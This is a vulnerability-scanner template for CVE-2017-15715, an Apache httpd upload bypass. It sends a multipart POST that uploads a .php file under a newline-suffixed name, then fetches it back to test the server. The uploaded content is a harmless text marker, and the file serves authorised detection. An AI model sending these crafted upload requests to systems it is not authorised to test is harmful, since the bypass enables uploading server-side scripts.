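# Detection template for CVE-2017-15715 (Apache httpd <FilesMatch> newline
# handling). Intended for authorised assessment of systems you operate.
id: CVE-2017-15715

info:
  name: Apache Arbitrary File Upload
  author: geeknik
  severity: high
  description: >-
    In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch>
    could match '$' to a newline character in a malicious filename, rather
    than matching only the end of the filename. This could be exploited in
    environments where uploads of some files are externally blocked, but only
    by matching the trailing portion of the filename.
  remediation: >-
    Upgrade Apache httpd to a release later than 2.4.29. Independently of the
    server version, have the upload handler validate and normalise filenames
    (rejecting control characters such as newlines) instead of relying only
    on a <FilesMatch> suffix pattern to block script extensions.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-15715
    cwe-id: CWE-20
  tags: cve,cve2017,apache,httpd,fileupload

requests:
  # Scope: request 1 posts to "/" with form fields "file" and "name", which
  # appears to mirror the upload form of the referenced vulhub lab. Targets
  # whose upload endpoint lives elsewhere are not exercised, so a negative
  # result is not evidence of a patched server.
  #
  # Side effect: the probe stores a file holding a random marker on the
  # target. Remove it after the scan and record the upload in the test log.
  #
  # The trailing \x0A in the submitted name and in the second request's path
  # is the newline character the CVE description refers to.
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ

        ------WebKitFormBoundaryKc8fBVDo558U4hbJ
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"

        {{randstr_1}}

        ------WebKitFormBoundaryKc8fBVDo558U4hbJ
        Content-Disposition: form-data; name="name"

        {{randstr}}.php\x0A
        ------WebKitFormBoundaryKc8fBVDo558U4hbJ--

      - |
        GET /{{randstr}}.php\x0A HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip,deflate
        Accept: */*

    # req-condition exposes per-request variables (body_2, status_code_2) so
    # the matcher can inspect the response to the second request.
    req-condition: true
    matchers:
      # A match means the marker uploaded in request 1 was returned by
      # request 2 with a 200 status, i.e. the file was stored and is
      # retrievable under the newline-suffixed name. The marker is plain
      # text, so a match does not by itself show that the PHP handler
      # processed the file; confirm the httpd version and handler
      # configuration before rating the finding.
      # The status check is kept in the same expression as the body check
      # because separate dsl entries are OR-ed by default.
      - type: dsl
        dsl:
          - 'status_code_2 == 200 && contains(body_2, "{{randstr_1}}")'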